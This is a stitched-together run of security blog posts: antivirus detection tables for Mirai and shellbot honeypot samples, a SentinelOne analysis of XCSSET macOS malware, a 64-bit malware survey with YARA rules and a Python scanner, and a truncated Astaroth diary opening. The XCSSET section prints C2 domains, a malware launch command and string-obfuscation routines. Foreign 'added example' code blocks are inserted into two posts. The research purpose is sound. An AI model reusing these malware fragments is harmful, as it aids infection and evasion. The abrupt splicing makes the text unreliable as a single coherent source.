Perl:IRCBot-AD [Trj] | 4 | ircbot/perl
Perl:IRCBot-D [Trj] | 4 | trojan.perl/shellbot
ELF:Mirai-ARL [Trj] | 4 | trojan.linux/gafgyt
ELF:Mirai-BWY [Trj] | 4 | trojan.mirai/linux
BV:Downloader-AMZ [Drp] | 4 | trojan.shell/smlbr, trojan.smlbr/shell
ELF:Mirai-AAJ [Trj] | 3 | trojan.mirai/linux
Perl:Shellbot-O [Trj] | 2 | trojan.perl/shellbot
ELF:Mirai-BXS [Trj] | 2 | trojan.mirai/linux
ELF:MiraiDownloader-MX [Trj] | 1 | trojan.linux/mirai
ELF:Goldfishgang-A [Bot] | 1 | trojan.mirai/linux
ELF:Mirai-APD [Trj] | 1 | trojan.mirai/linux
ELF:MiraiDownloader-MR [Drp] | 1 | downloader.linux/mirai

Avast and AVG have the same results and numbers, which is likely due to Avast acquiring AVG in 2016 [6].

GData Result | Count | VirusTotal Suggested Threats
Trojan.Shell.Agent.V | 452 | trojan.shell/linux, trojan.shell/malkey
Trojan.Shell.Agent.U | 100 | trojan.shell/linux, trojan.linux/shell, trojan.ircbot/shell, trojan.ircbot/linux, trojan.linux/ircbot, trojan.shell/ircbot
Script.Trojan.Agent.Q2DN10 | 73 | downloader., downloader.shell, downloader.shell/linux
Trojan.GenericKD.39794855 | 56 | trojan.shell
Trojan.GenericKD.50084125 | 32 | trojan., trojan.linux/bruteforce, trojan.linux/shell, trojan.linux/sshbru, trojan.linux
Linux.Trojan.Mirai.B | 29 | trojan.mirai/linux, trojan.linux/mirai
Linux.Application.CoinMiner.AH (2x) | 20 | trojan.linux/shell, trojan.linux/bash
Script.Trojan.Agent.SLJ1UA | 20 | trojan.shell, trojan.shell/gen2
Trojan.Linux.GenericKD.39722060 | 15 | trojan.linux/multiverze, trojan.linux/tygpz
Trojan.Downloader.JVHI | 13 | downloader.jvhi/shell
Trojan.Linux.Generic.208033 | 12 | trojan.linux/xorddos
Generic.Bash.MiraiA.30F5F415 | 11 | downloader.bash/miraia
Trojan.Linux.GenericA.73252 | 11 | trojan.linux/xorddos
Generic.Bash.MiraiB.CB1F6D93 | 10 | downloader.miraib/bash
Script.Trojan.Agent.Z0E85G | 10 | downloader.shell/bashdlod, trojan.linux/shell
Generic.Bash.MiraiA.1042638E | 9 | downloader.miraia/bash
Trojan.Linux.Generic.261801 | 8 | trojan.linux/shell
Generic.Bash.MiraiA.FC226613 | 8 | downloader.bash/linux
Trojan.Linux.GenericKD.40003689 | 8 | trojan.linux, trojan.linux/uselvhs22
Generic.Bash.MiraiA.37E69EBB | 7 | downloader.bash/miraia
Generic.Bash.MiraiA.9FE00F4A | 7 | downloader.bash/miraia
Generic.Bash.MiraiA.F71C9D36 | 7 | downloader.bash/miraia
Generic.Bash.MiraiB.43209CEF | 7 | downloader.miraib/bash
Generic.Bash.MiraiA.C840B7CF | 6 | downloader.bash/miraia, downloader.bash/linux
Generic.Bash.MiraiA.B7AF6546 | 6 | downloader.bash/miraia
Generic.Bash.MiraiA.76F02707 | 6 | downloader.bash/miraia
Trojan.GenericKD.61105047 | 6 | trojan.linux/shell
Trojan.Linux.Agent.IOS | 5 | trojan.linux/mirai
Backdoor.Perl.Shellbot.F | 5 | trojan.perl/shellbot
Generic.Bash.MiraiA.F31D7395 | 5 | downloader.bash/miraia
Trojan.GenericKD.50646874 | 5 | trojan.
Trojan.Linux.GenericKD.49342126 | 5 | trojan.linux/mirai
Generic.Bash.MiraiA.53DA044C | 5 | downloader.bash/miraia, downloader.bash/linux
Generic.Bash.MiraiA.CDE0B287 | 5 | downloader.bash/linux
Generic.Bash.MiraiA.5A5455F1 | 5 | downloader.bash/miraia
Trojan.GenericKD.46067161 | 4 | trojan.linux
Trojan.GenericKD.46077164 | 4 | trojan.linux/shell
Trojan.GenericKD.48821331 | 4 | trojan.
Trojan.GenericKD.39722073 | 4 | trojan.linux
Application.Linux.Generic.9905 | 4 | trojan.linux/gafgyt
Generic.Bash.MiraiA.2B19920F | 4 | downloader.miraia/bash
Generic.Bash.MiraiA.AB3356B6 | 4 | downloader.linux/bash
Generic.Bash.MiraiA.90D485C3 | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.1BB22156 | 4 | downloader.bash/miraia, downloader.bash/linux
Generic.Bash.MiraiA.77A820C1 | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.9F225672 | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.C00C7246 | 4 | downloader.bash/linux
Generic.Bash.MiraiA.261F2800 | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.91B96D6D | 4 | downloader.bash/miraia
Generic.Bash.MiraiA.8525AE6B | 4 | downloader.bash/miraia
Generic.Bash.MiraiB.81B3B899 | 4 | trojan.miraib/bash
Generic.Bash.MiraiA.42A992E0 | 4 | downloader.bash/miraia, downloader.linux/bash
Linux.Trojan.Agent.FRYE0V | 3 | trojan.mirai/linux
Generic.Bash.MiraiB.EB588E65 | 3 | downloader.miraib/bash
Generic.Bash.MiraiA.F4E0D44D | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.9FAC84B8 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.42844671 | 3 | downloader.bash/miraia
Trojan.GenericKD.50084126 | 3 | trojan.linux/shell
Linux.Trojan.Mirai.E | 3 | trojan.mirai/linux
Trojan.Linux.Mirai.GDC | 3 | trojan.linux/mirai
Generic.Bash.MiraiA.49306ADF | 3 | downloader.linux/bash
Generic.Bash.MiraiA.F9E49AE2 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.87330CC0 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.A6961F86 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.29E60E32 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.1DCA368B | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.32EA1F82 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.370A6145 | 3 | downloader.bash/linux
Generic.Bash.MiraiA.88F9FED5 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.A6CEE47A | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.6215B474 | 3 | downloader.miraia/bash
Generic.Bash.MiraiA.BF170979 | 3 | downloader.linux/bash, downloader.bash/linux
Linux.Application.CoinMiner.AH | 3 | trojan.linux/sshbru
Generic.Bash.MiraiA.8991856A | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.D4BA1004 | 3 | downloader.bash/miraia
Generic.Bash.MiraiA.EE96A6CC | 3 | downloader.bash/miraia
Generic.Bash.MiraiB.C122DEF0 | 2 | trojan.miraib/bash
Linux.Trojan.Agent.21WIPQ | 2 | trojan.linux/mirai
Script.Trojan.Agent.D34HUR | 2 | downloader.linux
Backdoor.Perl.Shellbot.B | 2 | trojan.perl/shellbot
Generic.Bash.MiraiA.19B73922 | 2 | downloader.miraia/bash
Generic.Bash.MiraiA.F9CC4608 | 2 | downloader.linux/bash, downloader.bash/linux
Generic.Bash.MiraiA.E2FF41E4 | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.F384FF05 | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.03BF947A | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.D2936D49 | 2 | downloader.bash/miraia
Script.Trojan.Agent.XQDCBP | 2 | downloader.linux/shell
Trojan.Linux.GenericKD.49319781 | 2 | trojan.linux/mirai
Generic.Bash.MiraiA.AFC860A3 | 2 | downloader.bash/miraia
Linux.Trojan.Agent.71ZXJT | 2 | trojan.linux/mirai
Generic.Bash.MiraiA.0A4B5647 | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.3085EB19 | 2 | downloader.bash/linux
Generic.Bash.MiraiA.C8C8B46F | 2 | downloader.linux/bash
Generic.Bash.MiraiA.E0206CAA | 2 | downloader.miraia/bash
Generic.Bash.MiraiA.AFD545E8 | 2 | downloader.bash/miraia
Generic.Bash.MiraiA.9DFBA98D | 2 | downloader.bash/linux
Generic.Bash.MiraiA.77508253 | 2 | downloader.bash/miraia
Trojan.Linux.Generic.266531 | 2 | trojan.linux/shell
Generic.Bash.MiraiA.999DC364 | 2 | downloader.bash/miraia
Generic.Bash.MiraiB.C388CEE8 | 1 | downloader.miraib/bash
Trojan.Linux.Generic.258109 | 1 | trojan.linux/mirai
Generic.Bash.MiraiB.9F77C950 | 1 | downloader.miraib/bash
Gen:Variant.Trojan.Linux.Mirai.8 | 1 | trojan.mirai/linux
Trojan.GenericKD.48821326 | 1 | trojan.linux
Trojan.Linux.Generic.207109 | 1 | trojan.linux/shell
Generic.Bash.MiraiA.F7E66D30 | 1 | downloader.bash/miraia
Linux.Trojan.Agent.0JQTA6 | 1 | trojan.linux/mirai
Generic.Bash.MiraiA.6AB1054A | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.E4FF83F6 | 1 | downloader.bash/miraia
Linux.Trojan.Mirai.J | 1 | trojan.mirai/linux
Generic.Bash.MiraiA.06015B18 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.716695BA | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.CA694A08 | 1 | downloader.bash/linux
Generic.Bash.MiraiA.7D12497D | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.24330190 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.7AD1CA92 | 1 | downloader.bash/linux
Generic.Bash.MiraiA.9A967DD3 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.A3F75002 | 1 | downloader.linux/bash
Generic.Bash.MiraiB.83D16FFF | 1 | downloader.bash/miraib
Generic.Bash.MiraiA.7176EFCA | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.BBDDAFB3 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.9C2BFED6 | 1 | downloader.bash/miraia
Generic.Bash.MiraiA.27A5FB7E | 1 | downloader.bash/miraia
Generic.Bash.MiraiB.A8550CC8 | 1 | downloader.bash/miraib
Script.Trojan.Agent.SSSDZG | 1 | trojan.shell/smlbr

Microsoft Result | Count | VirusTotal Suggested Threats
TrojanDownloader:Linux/Morila!MTB | 118 | trojan.linux/shell, downloader.bash/linux, downloader.bash/miraia, downloader.linux/bash, downloader.linux/shell
Backdoor:Linux/IRCbot.YA!MTB | 95 | trojan.shell/linux, trojan.linux/shell, trojan.ircbot/shell, trojan.ircbot/linux, trojan.linux/ircbot, trojan.shell/ircbot
Trojan:Linux/Multiverze | 58 | trojan.linux/uselvhs22, trojan.linux/mirai, trojan.linux/tygpz, trojan.mirai/linux, trojan.linux/multiverze
TrojanDownloader:Linux/Morila.B!MTB | 57 | downloader.bash/miraia, downloader.bash/linux
TrojanDownloader:Linux/ShWg.YB!MTB | 54 | downloader.bash/miraia, trojan.linux/shell, downloader.bash/linux
Trojan:Script/Wacatac.B!ml | 40 | downloader.bash/miraib, trojan.miraib/bash, trojan.mirai/linux, downloader.miraib/bash
HackTool:Linux/Sshbru!MTB | 26 | trojan.linux/shell, trojan.linux, trojan.linux/sshbru
DoS:Linux/Xorddos.A | 23 | trojan.linux/xorddos
Trojan:Linux/CoinMiner!rfn | 16 | trojan.linux/shell
Trojan:Linux/CoinMiner.N!MTB | 9 | miner.linux/camelot
HackTool:Linux/Sshbru!rfn | 8 | trojan.linux/shell, trojan.linux/sshbru, trojan.linux/bruteforce
Backdoor:Linux/Mirai.BO!MTB | 6 | trojan.linux/mirai, linux
Trojan:Win32/Occamy.CAD | 4 | trojan.linux
Backdoor:HTML/Derflop.A | 4 | trojan.perl/shellbot
Backdoor:Linux/Gafgyt.A!MTB | 4 | trojan.linux/gafgyt
Trojan:Unix/Multiverze | 3 | trojan.linux/shell
Trojan:Linux/Mirai.AB!MTB | 2 | downloader.bash/miraia
Trojan:Linux/Downldr.AE!MTB | 2 | downloader.bash/miraia
Backdoor:Linux/Mirai.AN!xp | 1 | trojan.mirai/linux
Trojan:Linux/ZkarletFlash | 1 | trojan.mirai/linux
Backdoor:Linux/Mirai.AW!MTB | 1 | trojan.mirai/linux
TrojanDownloader:Linux/Mirai.C!MTB | 1 | downloader.linux/mirai

Summarized and detailed hash data can be downloaded from here [7]. 

When using tools like VirusTotal it is important to be aware of name changes over time and that vendors have their own naming schemes. Make sure that you’re using the latest available results and using the “Reanalyse File” option within VirusTotal to update analysis information. 

[1] https://www.virustotal.com
[2] https://isc.sans.edu/honeypot.html
[3] https://github.com/jslagrew/cowrieprocessor/blob/main/submit_vtfiles.py
[4] https://en.wikipedia.org/wiki/Mirai_(malware)
[5] https://exceljet.net/formula/xlookup-latest-by-date
[6] https://www.comparitech.com/antivirus/avast-vs-avg/
[7] https://www.dropbox.com/sh/jswjv5mlvku0ep7/AADm5vyoR8Jwil7_BgqXjz7ra?dl=0

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

I recorded a video for yesterday’s diary entry James Webb JPEG With Malware.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


On Wednesday’s stormcast, Johannes talked about a JPEG picture (coming from the James Webb telescope) that malware authors had laced with malware.

Threat actors behind the XCSSET malware have been relatively quiet since last year. However, new activity beginning around April 2022 and increasing through May to August shows that actors have not only adapted to changes in macOS Monterey, but are preparing for the demise of Python, an integral and essential part of their current toolkit.

In this post, we review changes made to the latest versions of XCSSET and reveal some of the context in which these threat actors operate.

XCSSET Changes in 2022

Since XCSSET first appeared, the authors have made consistent use of two primary tools to obfuscate droppers and dropped files: SHC and run-only compiled AppleScripts, respectively.

SHC-compiled shell scripts are opaque to traditional static scanning tools and contain only a few human-readable strings.

As all SHC-compiled binaries, legitimate or malicious, contain these same strings, signature scanners cannot distinguish between them.

SHA1: 127b66afa20a1c42e653ee4f4b64cf1ee3ed637d

Dynamic execution of this recent SHC-compiled XCSSET dropper, currently with 0 detections on VirusTotal despite having been known for 2 months, also reveals that the malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022. These fake apps are invariably dropped in a parent folder created in random locations in the user’s Library folder. When executed, this particular sample writes the fake Notes.app to:

~/Library/Application Scripts/com.apple.CalendarAgent

The updated run-only AppleScripts that XCSSET drops as second-stage payloads use a collection of newly-registered domains:

set domains to {
	"superdocs.ru",
	"melindas.ru",
	"kinksdoc.ru",
	"adobefile.ru",
	"gurumades.ru",
	"appledocs.ru",
	"45.82.153.92",
	"gismolow.com",
	"Cosmodron.com"
}

Changes in the replicator.applescript file, which infects users’ Xcode projects with the XCSSET malware, show that both curl’s --max-time value and the script’s phaseName variable have now been randomized, presumably to hamper static detection or hunting rules.

Xcode infection script from 2021 (Left) and 2022 (Right)

The --max-time option is now set to a random value between 5 and 9, while phaseName is chosen from the following list:

"Copy Bundle Frameworks"
"Compile Binary Libraries"
"Compile Swift Frameworks"
"Binary Frameworks Compiler"

In the previous version of XCSSET, the malware created and dropped files for its own caches and control functions in a folder at ~/Library/Caches/GeoServices/. This has been modified slightly to “GitServices”.

Persistence plists are currently chosen from the following list:

com.apple.airplay.plist
com.apple.spx.plist
com.google.keystore.plist
com.google.chrome.plist

and target a file at one of:

~/Library/Caches/GitServices/CloudServiceWorker
~/Library/Caches/GitServices/AppleWebKit

As previously, XCSSET continues to attempt to evade detection by masquerading as either system software or the almost ubiquitous Google and Chrome browser software.
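A defender-side check built from the persistence details above, as an added example in Python (not SentinelOne's code; the two plists are constructed for the demonstration): flag LaunchAgent plists whose label or file name is on XCSSET's list, or whose program lives under ~/Library/Caches/GitServices, and as a softer signal any agent that executes out of a Caches directory at all.

```python
import os
import plistlib
import re

# Label / file-name stems and drop paths the post reports XCSSET using for
# persistence (taken from the lists above).
XCSSET_LABELS = {"com.apple.airplay", "com.apple.spx", "com.google.keystore", "com.google.chrome"}
XCSSET_TARGET = re.compile(r"/Library/Caches/GitServices/(CloudServiceWorker|AppleWebKit)$")

# Constructed LaunchAgent plists for the demonstration (not real files).
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.airplay</string>
  <key>ProgramArguments</key><array>
    <string>/Users/user1/Library/Caches/GitServices/CloudServiceWorker</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>org.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
</dict></plist>"""


def launch_agent_findings(filename, plist_bytes):
    """Reasons a LaunchAgent plist matches the XCSSET persistence pattern; [] if none."""
    findings = []
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception as exc:  # malformed or non-plist content is itself worth a look
        return ["could not parse plist: %s" % exc]
    label = str(plist.get("Label", ""))
    stem = filename[:-6] if filename.endswith(".plist") else filename
    if label in XCSSET_LABELS or stem in XCSSET_LABELS:
        findings.append("label %s (file %s) is in XCSSET's persistence list" % (label, filename))
    # launchd takes the executable from Program or from ProgramArguments[0]
    args = plist.get("ProgramArguments") or []
    program = str(plist.get("Program") or (args[0] if args else ""))
    if XCSSET_TARGET.search(program):
        findings.append("program is an XCSSET drop path: %s" % program)
    elif "/Library/Caches/" in program:
        findings.append("program runs from a Caches directory: %s" % program)
    return findings


def scan_launch_agents(directory):
    """Map every *.plist in a LaunchAgents directory to its findings (hits only)."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(directory, name), "rb") as fh:
            hits = launch_agent_findings(name, fh.read())
        if hits:
            results[name] = hits
    return results


if __name__ == "__main__":
    for name, data in [("com.apple.airplay.plist", SUSPECT_PLIST),
                       ("org.example.updater.plist", BENIGN_PLIST)]:
        print(name, "->", launch_agent_findings(name, data) or "clean")
    # On a live host: scan_launch_agents(os.path.expanduser("~/Library/LaunchAgents"))
```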

XCSSET’s Updated Fake Notes.app

As noted, XCSSET makes use of a fake Notes.app to hide the primary executable, a.scpt, itself launched by the run-only compiled AppleScript main.scpt when “Notes” is executed via the dropped LaunchAgent.

The SHC-compiled dropper script defines several random paths to use as parent directories for the fake Notes.app.

osacompile -x -e try do shell script "osascript '/Users/user1/Library/Application Support/com.apple.spotlight/Notes.app/Contents/Resources/Scripts/a.scpt'" end try -o

The a.scpt remains, in essence, the same as earlier versions except that the encoding handler has changed from one previously shared with OSAMiner.

-- Decode an obfuscated string by shifting every character code down by 100
on xe(_str)
	set x to id of _str
	repeat with c in x
		set contents of c to c - (102 - 2)
	end repeat
	return string id x
end xe

-- Same scheme with a shift of 101
on xex(_str)
	set x to id of _str
	repeat with c in x
		set contents of c to c - (102 - 1)
	end repeat
	return string id x
end xex

Malicious Run-Only AppleScripts

Aside from a.scpt, XCSSET makes use of multiple run-only AppleScripts. Although these scripts are written to disk as compiled and run-only, we were able to capture the scripts in plain text on the wire. In the updated version of XCSSET, these continue to target Telegram and other chat apps heavily in use by Chinese users such as WeChat and Tencent’s 360, along with an expanded list of browsers, including Opera, Brave, Edge and other Chromium-based browsers.

Many of the scripts shown above share the same structure and list of handlers but make minor changes to handle the specifics of each target application.

check_loop()
log(message)
runme()
upload(filePath, fileName)
urlencode(theText)

The contacts.applescript has the role of targeting various chat apps from which to steal and exfiltrate data.

Among other tasks, the payloader.applescript checks for AppleBackLightDisplay, presumably to distinguish between laptops and desktops. This info is part of what is exfiltrated, showing that the threat actors are keen to gather very precise hardware profiling information.

Similarly, the threat actors are interested in exactly how up-to-date the victim is with Apple’s XProtect and MRT malware removal tool, presumably all the better to target them with more effective payloads. The listing.applescript script is used for this purpose.

Also of interest is the use of the public service transfer.sh for exfiltrating data files that are too large for the attacker’s server.

XCSSET Changes for Monterey and Python

One of the more interesting things we noted in recent samples of XCSSET is the developer’s awareness of OS versions and the clear intent that the authors are here for the long run.

Right from its initial version, XCSSET made use of python scripts for certain functions, in particular for dropping fake application icons on the Dock. It achieved this by abusing a public Github repo called DockUtil. In the latest version, we also note that XCSSET uses python to parse and steal data from the user’s (legitimate) Notes.app. For this functionality, they use a modified version of a plugin from a legitimate python-based tool called mac_apt used by macOS forensics experts.

mac_apt on Github (left); malware script found in XCSSET (right)

XCSSET’s authors have updated their AppleScripts to account for Apple’s recent removal of python 2. The following image shows how the malware authors updated their safari_remote.applescript for python3 and Monterey 12.3 and above.

Similarly, the comment in edge_remote.applescript shows that the authors are keenly aware that DockUtil and other utilities will need to be replaced in their toolkit in the near future.

XCSSET Threat Actors and Targets

While very little is publicly known about the actors behind XCSSET, their motivations or their exact targets, the actors have engaged with journalists and security researchers at times. The original version of XCSSET, which appeared in August 2020, contained the full names of two individuals. Subsequently, a Twitter account with the name ‘Hans’ briefly became active and sent private messages to a journalist, claiming that he was the real author and not the two individuals whose names appeared in the malware code. The same individual claimed that the targets were “developers from China” and “big gambling business”.

‘Hans’ subsequently disappeared from view, but about a year later another Twitter account in the name of ‘Vlad F’ began reaching out to researchers, complaining that they had been falsely accused of being the actors behind the malware.

While Apple refused to comment on these claims at the time, Vlad F’s Twitter account ceased to respond. Earlier this year, however, Chinese users reported XCSSET infections and attempts to unlock stolen “accounts” from victims in return for “200 USDT” (a so-called “stable” bitcoin belonging to Tether).

Prior to that, researchers had noticed that XCSSET infections were being embedded in a number of Github repositories.

It seems a new trojan is going around and affecting @Apple #iOS builds. I don’t know the original method of infection, but I’m starting to see some public repos on GitHub being affected https://t.co/EmutE0jCbD

— Pier Fumagalli 💉💉💉🦠💉😷 (@ianosh) June 4, 2021

At this point in time, it’s unclear whether these infected repos are victims or plants by threat actors hoping to infect unwary users. It has been suggested that unsuspecting users may be pointed to the infected repositories through tutorials and screencasts for novice developers. Our research into XCSSET and its infection vectors continues.

Staying Protected Against XCSSET Malware on macOS

XCSSET has many moving parts, and samples change rapidly. While some static signatures such as those used in Apple’s XProtect service will detect known samples, full protection against evolving threats like these is only really possible with a multi-engine agent including behavioral AI.

SentinelOne Singularity fully protects SentinelOne customers against XCSSET malware.

With the agent policy set to ‘Protect’, the malware is prevented from executing or dropping any of its components. For this demonstration, we set the policy to ‘Detect-only’ in order to observe further stage payloads.

Indicators of Compromise


Last week, I was teaching FOR610 in Amsterdam. When we review ASM, we have a module about the differences between 32-bit and 64-bit code (how parameters are passed to functions/API calls, calling conventions, etc.). It’s important to understand this because most computers are built around a 64-bit CPU today, but attackers are still deploying a lot of 32-bit malware, for compatibility reasons and because this code runs without problems (if you respect Microsoft’s guidelines and APIs). A student asked me if there was a lot of native 64-bit malware in the wild. Is there a real trend? I decided to have a look at a bunch of samples and check in practice whether this trend was real.

The problem is getting enough samples. I have my own “malware zoo” but it’s pretty small. You can try to get samples from major players like VirusTotal, but your API quotas probably won’t allow you to download a lot of samples. I decided to have a look at free (but still trusted) resources. My choice was MalwareBazaar[1]. I like this service provided by abuse.ch. They allow you to download samples for free and also report some interesting stats based on YARA rules[2].

I downloaded all daily archives from Feb 27 2020 until last week (217GB of zip archives). To detect whether a PE file contains 32-bit or 64-bit code, you just check a few bytes at the beginning of the file:

00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
00000010: b800 0000 0000 0000 4000 0000 0000 0000  ........@.......
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000 0000 0000 0000 8000 0000  ................
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468  ........!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f  is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320  t be run in DOS 
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000  mode....$.......
00000080: 5045 0000 4c01 0900 8406 f862 0000 0000  PE..L......b....
00000090: 0000 0000 e000 2e03 0b01 0223 0004 ac00  ...........#....
000000a0: 005a e900 0008 0000 b014 0000 0010 0000  .Z..............
000000b0: 0020 ac00 0000 4000 0010 0000 0002 0000  . ....@.........
000000c0: 0400 0000 0100 0000 0400 0000 0000 0000  ................
000000d0: 00c0 e900 0004 0000 179d e900 0200 4001  ..............@.

If you read “PE..L”, it’s a 32-bit sample; if you read “PE..d”, it’s a 64-bit sample (0x4c and 0x64 are the low bytes of the Machine field values 0x014c and 0x8664). I wrote a quick and dirty YARA rule to match these sequences of bytes:

rule pe32bits
{
    meta:
        description = "Match a 32-bit PE"
    strings:
        $a = {50 45 00 00 4c}
    condition:
        $a in (0..500)
}
rule pe64bits
{
    meta:
        description = "Match a 64-bit PE"
    strings:
        $a = {50 45 00 00 64}
    condition:
        $a in (0..500)
}
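The two rules above only test the low byte of the Machine field and only look in the first 500 bytes. As an added example (my code, not the diary's), the parser below follows e_lfanew from the DOS header to the exact position of the PE signature, reads the whole Machine field and cross-checks it with the Optional Header magic; it also emulates the YARA rules to show the two cases where they differ (ARM64 shares its low byte 0x64 with x86-64, and a DOS stub longer than 500 bytes is missed entirely). The sample headers are constructed test data, not real samples.

```python
import struct

# Machine values and Optional Header magics from the PE/COFF specification.
PE_SIGNATURE = b"PE\0\0"
MACHINE_NAMES = {
    0x014C: "i386",      # 32-bit x86
    0x8664: "x86-64",    # 64-bit x86 (AMD64)
    0xAA64: "ARM64",     # 64-bit ARM; same low byte 0x64 as x86-64
    0x01C0: "ARM",
    0x01C4: "ARMNT",     # 32-bit ARM Thumb-2 (Windows on ARM)
}
MAGIC_PE32 = 0x10B
MAGIC_PE32_PLUS = 0x20B


def pe_arch(data):
    """Return (machine_name, bitness) for a PE image, or None if data is not one.

    Follows e_lfanew (DOS header offset 0x3C) to the signature, decodes the
    full 16-bit Machine field and derives the bitness from the Optional
    Header magic (0x10B = PE32, 0x20B = PE32+).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Signature (4) + COFF header (20) + Optional Header magic (2) must fit.
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return None
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    (magic,) = struct.unpack_from("<H", data, e_lfanew + 24)
    name = MACHINE_NAMES.get(machine, "unknown(0x%04x)" % machine)
    bits = {MAGIC_PE32: 32, MAGIC_PE32_PLUS: 64}.get(magic)
    return name, bits


def low_byte_verdict(data):
    """Emulate the diary's YARA rules: the 5-byte pattern must start at an
    offset in 0..500 and only the low byte of Machine is tested."""
    head = data[:505]
    if b"PE\0\0L" in head:
        return "pe32bits"
    if b"PE\0\0d" in head:
        return "pe64bits"
    return None


def make_pe_header(machine, magic, e_lfanew=0x80):
    """Construct a minimal, non-executable PE header for testing (constructed
    data): DOS header, signature, COFF header and the Optional Header magic."""
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xF0, 0x0002)
    return bytes(dos) + PE_SIGNATURE + coff + struct.pack("<H", magic)


if __name__ == "__main__":
    samples = {
        "x86, e_lfanew=0x80": make_pe_header(0x014C, MAGIC_PE32),
        "x86-64": make_pe_header(0x8664, MAGIC_PE32_PLUS),
        "ARM64": make_pe_header(0xAA64, MAGIC_PE32_PLUS),
        "x86, long DOS stub (e_lfanew=0x240)": make_pe_header(0x014C, MAGIC_PE32, 0x240),
    }
    for label, blob in samples.items():
        print("%-38s parsed=%s  yara-style=%s"
              % (label, pe_arch(blob), low_byte_verdict(blob)))
```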

Because I had a lot of ZIP archives to process and did not want to use too much storage, I used Python to read the files straight from the ZIP archives and run the YARA rules against them. I focused only on “.exe” and “.dll” files:

#!/usr/bin/python3
import datetime
import glob
import re
import yara
from zipfile import ZipFile

# The pe32bits / pe64bits rules shown above, saved as 3264.yar.
rules = yara.compile(filepath='3264.yar')
print("date,file,arch")
# Daily archives are named YYYY-MM-DD.zip and protected with the password "infected".
zipList = glob.glob('*.zip')
for zipName in zipList:
    day = datetime.datetime.strptime(zipName.split(".")[0], '%Y-%m-%d').strftime("%d/%m/%Y %H:%M:%S")
    with ZipFile(zipName, 'r') as zipObj:
        zipObj.setpassword(b"infected")
        files = zipObj.infolist()
        for f in files:
            # Only .exe and .dll members are scanned.
            if re.match(r'[0-9]+.*\.(exe|dll)', f.filename):
                # Read the sample from the archive in memory; nothing is extracted to disk.
                with zipObj.open(f.filename, mode='r') as fdata:
                    matches = rules.match(data=fdata.read())
                if len(matches) > 0:
                    print("%s,%s,%s" % (day, f.filename, matches[0]))

Let’s have a look at the results. I loaded the CSV file into my Splunk instance.

175.962 samples have been inspected (only EXE & DLL files)
10.952 were detected as 64-bits code (6.224%)
Only 1 DLL was detected as 64-bits code (HASH:86150c570e2d253d54fd5f70c9fe62ff37897dc3a7b21658fa891263a843790d)

If we check on a timeline, we have a small trend:

I have no idea about the peak of samples submitted in November 2021, but we see that, especially in the last months, there are more and more 64-bit samples in the wild. Can we rely on these statistics? Samples downloaded from MalwareBazaar are only the visible part of the iceberg, but as it became popular, many security researchers use it. If you have other statistics, please share them with us!

[1] https://bazaar.abuse.ch
[2] https://bazaar.abuse.ch/export/json/yara-stats/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

Today’s diary is a quick post about an Astaroth (Guildma) malware infection I generated today, Friday 2022-08-19, from a malicious Boleto-themed email pretending to be from Grupo Solução & CIA.  Boleto is a payment method used in Brazil, while Grupo Solução & CIA is a Brazil-based company.

Images from the infection


